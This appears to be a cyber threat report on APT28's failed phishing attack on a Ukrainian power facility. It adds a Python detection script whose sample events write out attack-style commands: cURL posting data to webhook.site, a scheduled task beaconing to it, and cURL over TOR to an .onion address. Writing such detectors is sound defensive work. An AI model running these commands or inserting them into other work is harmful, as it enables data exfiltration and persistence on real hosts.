Ukraine’s Computer Emergency Response Team (CERT-UA) successfully defended a critical power infrastructure facility from a cyber attack [4]. The attack was attributed to the Russian threat actor APT28 [2] [3] [4] [5], also known as BlueDelta [2] [3] [4], Fancy Bear [1] [2] [3] [4], Forest Blizzard [2] [3] [4], or FROZENLAKE [2] [3] [4]. This incident is part of ongoing phishing attacks against Ukraine [4].

Description

The attack began with a phishing email carrying a malicious ZIP archive [2] [3] [4]; opening its contents started the infection chain. APT28 combined several tactics: opening decoy web pages to distract the victim [2], dropping and executing BAT and VBS files [2], and exfiltrating information from the host [2] [3]. Malicious traffic was routed through a TOR hidden service [2]. For persistence [3], the attackers relied on a legitimate service, webhook.site, as a channel for remote command execution via cURL [3]. The attack ultimately failed because access to the resources the chain depended on was restricted on the targeted systems [2] [3] [4], in particular the Mocky API and the Windows Script Host [2] [4]. APT28 has previously been associated with the use of Mocky APIs [2] [3], and CERT-UA has detected attempted APT28 attacks against Ukrainian organizations before. The operation appears to have been aimed at enabling future operations rather than at causing immediate disruption [1]. A separate campaign [4], attributed to GhostWriter [2] [3] [4] [5], exploited a zero-day vulnerability in WinRAR to deploy PicassoLoader and Cobalt Strike [4]. Some of the phishing campaigns against Ukraine also use the malware obfuscation engine ScrubCrypt [4].
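The chain above (a dropped BAT/VBS pair run through the Windows Script Host, cURL beaconing to webhook.site or Mocky, and traffic routed over TOR) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from CERT-UA or any of the cited reports: a small set of detection heuristics run over constructed Sysmon-style process events. The field names, the sample events, the scheduled-task persistence indicator and the assumption that cURL reaches TOR through a local SOCKS5 proxy on port 9050 are all illustrative assumptions; the page only states that webhook.site, cURL, TOR and the Windows Script Host were involved.

```python
"""Heuristic detection of the APT28 BAT/VBS -> cURL -> webhook.site/Mocky chain.

Added example over constructed Sysmon Event ID 1 style events. Stage names,
thresholds and the TOR/schtasks indicators are assumptions, not CERT-UA's rules.
"""
import re
from dataclasses import dataclass

# Indicators the report supports: Windows Script Host running a dropped script,
# cURL talking to webhook.site / Mocky, TOR in the traffic path.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SUSPECT_DOMAINS = ("webhook.site", "mocky.io")  # run.mocky.io is covered by "mocky.io"
# Script launched from a user-writable location (assumed drop directories).
USER_WRITABLE = re.compile(
    r"(?i)\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\temp\\|\\programdata\\")
# Assumption: cURL pushed through a local TOR SOCKS proxy, or an .onion target.
TOR_PROXY = re.compile(r"(?i)--socks5(-hostname)?\s+(127\.0\.0\.1|localhost):9050|\.onion\b")


@dataclass
class ProcEvent:
    image: str     # full path of the created process
    parent: str    # full path of the parent process
    cmdline: str   # command line as logged


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the stage labels matched by a single process-creation event."""
    hits = []
    name, parent, cmd = basename(ev.image), basename(ev.parent), ev.cmdline.lower()
    if name in SCRIPT_HOSTS and USER_WRITABLE.search(ev.cmdline):
        hits.append("wsh-script-from-user-dir")          # VBS dropped and run via WSH
    if name == "cmd.exe" and parent in SCRIPT_HOSTS:
        hits.append("bat-launched-by-wsh")               # VBS handing off to a BAT
    if name == "curl.exe" and any(d in cmd for d in SUSPECT_DOMAINS):
        hits.append("curl-to-webhook-or-mocky")          # C2 / exfil over a legit service
    if name == "schtasks.exe" and "/create" in cmd and "curl" in cmd:
        hits.append("scheduled-task-curl")               # assumed persistence mechanism
    if name == "tor.exe" or (name == "curl.exe" and TOR_PROXY.search(cmd)):
        hits.append("tor-routing")                       # assumed TOR plumbing
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> stage labels for every event that matched something."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


def correlate(events: list[ProcEvent], threshold: int = 3) -> tuple[set[str], bool]:
    """Collapse one host's events into the set of chain stages seen and a verdict.

    A single stage (a user running cscript on a script in Downloads) is noise;
    several distinct stages on one host within a window is the chain.
    """
    stages = {h for ev in events for h in classify(ev)}
    return stages, len(stages) >= threshold


# Constructed sample telemetry: one benign browser launch, the chain, one benign
# cscript invocation from System32. Paths, user name and URLs are made up.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.com'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r'wscript.exe //B "C:\Users\alice\AppData\Local\Temp\update.vbs"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
              r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\run.bat"'),
    ProcEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
              r'curl.exe -s -X POST -d "alice" https://webhook.site/00000000-0000-0000-0000-000000000000'),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
              r'schtasks.exe /create /sc minute /mo 10 /tn Updater /tr "curl.exe -s https://webhook.site/00000000-0000-0000-0000-000000000000"'),
    ProcEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
              r"curl.exe --socks5-hostname 127.0.0.1:9050 http://exampleonionaddress.onion/"),
    ProcEvent(r"C:\Windows\System32\cscript.exe", r"C:\Windows\System32\services.exe",
              r'cscript.exe "C:\Windows\System32\slmgr.vbs" /dlv'),
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(labels)}")
    stages, chain = correlate(SAMPLE_EVENTS)
    print(f"stages seen: {sorted(stages)}; chain detected: {chain}")
```

The individual heuristics are deliberately narrow (a scheduled task that calls cURL, a script host started on a file under a user profile) because each one fires on legitimate administration too; the value is in `correlate`, which only raises a verdict once several distinct stages appear on the same host. On the preventive side, the control that stopped this intrusion can be enforced outright: Windows Script Host is disabled by setting the `Enabled` value under `HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings` to `0`, and egress to webhook.site and mocky.io can be denied at the proxy for hosts that have no business reason to reach them.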

Conclusion

The successful defense of the critical power infrastructure facility highlights the importance of robust cybersecurity measures. Restricting access to the resources the malware depended on, the Mocky API and the Windows Script Host, was what broke the chain, even though the initial phishing lure reached its target. However, the ongoing phishing campaigns and the tactics used by threat actors such as APT28 and GhostWriter underscore the need for continuous vigilance and proactive mitigation. Future operations by these actors could pose significant risks, requiring stronger security controls and increased awareness within Ukrainian organizations.

References

[1] https://www.infosecurity-magazine.com/news/russia-apt28-attack-ukraine-power/
[2] https://www.redpacketsecurity.com/ukraine-s-cert-thwarts-apt-s-cyberattack-on-critical-energy-infrastructure/
[3] https://thehackernews.com/2023/09/ukraines-cert-thwarts-apt28s.html
[4] https://vulnera.com/newswire/ukraines-cert-foils-apt28-cyberattack-aimed-at-energy-infrastructure/
[5] https://cyber.vumetric.com/security-news/2023/09/06/ukraine-s-cert-thwarts-apt28-s-cyberattack-on-critical-energy-infrastructure/